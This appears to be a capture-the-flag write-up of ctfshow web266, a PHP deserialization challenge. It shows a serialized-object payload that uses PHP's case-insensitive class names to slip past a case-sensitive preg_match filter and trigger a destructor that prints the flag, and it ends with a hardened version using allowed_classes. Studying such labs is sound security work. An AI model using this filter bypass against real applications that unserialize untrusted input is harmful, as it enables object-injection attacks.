PHP deserialization challenges: bypassing preg_match (1)

九点韶留学 2023-11-11 (34 views)

ctfshow web266

<?php

highlight_file(__FILE__);

include('flag.php');
$cs = file_get_contents('php://input');


class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function login(){
        return $this->username===$this->password;
    }
    public function __toString(){
        return $this->username;
    }
    public function __destruct(){
        global $flag;
        echo $flag;
    }
}
$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){
    throw new Exception("Error $ctfshowo",1);
}
?>

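This challenge relies on the fact that PHP class names and method names are case-insensitive (variable names are case-sensitive). The pattern /ctfshow/ has no i modifier, so the preg_match check is case-sensitive, while unserialize() resolves the class name without regard to case. A class name containing an upper-case letter therefore passes the preg_match check, no exception is thrown, and __destruct() echoes $flag when the script ends.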

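There is one pitfall: the payload must not be URL-encoded. It is submitted through php://input (the raw request body), which is not URL-decoded on the server side. If it were submitted as a GET parameter instead, it could be URL-encoded before sending.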

<?php
class Ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';

}

$a =new Ctfshow();

//echo urlencode(serialize($a));
echo serialize($a);
?>

payload:

O:7:"Ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}
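
The same mismatch from the defender's side, as an added example that is not part of the original post or the challenge: the class is a stand-in whose destructor only counts calls (the `$destructed` counter is an assumption for illustration), and the input is the payload string shown above. It compares the page's case-sensitive filter with `unserialize()` called with `allowed_classes` set to `false`.

```php
<?php
// Stand-in for the challenge class: the destructor only records that it ran.
class ctfshow {
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
    public static $destructed = 0;   // hypothetical counter, not in the challenge
    public function __destruct() { self::$destructed++; }
}

// Input taken from this page: the serialized object with a capitalised class name.
$cs = 'O:7:"Ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}';

// 1) The page's flow: unserialize first, then a case-sensitive regex on the raw input.
$obj = @unserialize($cs);
$blocked = preg_match('/ctfshow/', $cs) === 1;
printf("original filter blocked input: %s\n", var_export($blocked, true));
printf("class instantiated: %s\n", get_class($obj));   // name resolved case-insensitively
unset($obj);                                           // last reference gone, destructor fires
printf("destructor calls (original flow): %d\n", ctfshow::$destructed);

// 2) Hardened flow: never instantiate application classes from untrusted bytes.
ctfshow::$destructed = 0;
$safe = unserialize($cs, ['allowed_classes' => false]);
printf("hardened result class: %s\n", get_class($safe)); // __PHP_Incomplete_Class
unset($safe);                                            // no ctfshow object, so no ctfshow destructor
printf("destructor calls (hardened flow): %d\n", ctfshow::$destructed);
```

With `allowed_classes` set to `false` the data is still parsed, but no magic method of an application class can be triggered; where the input only needs to carry plain data, `json_decode()` avoids object instantiation altogether.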
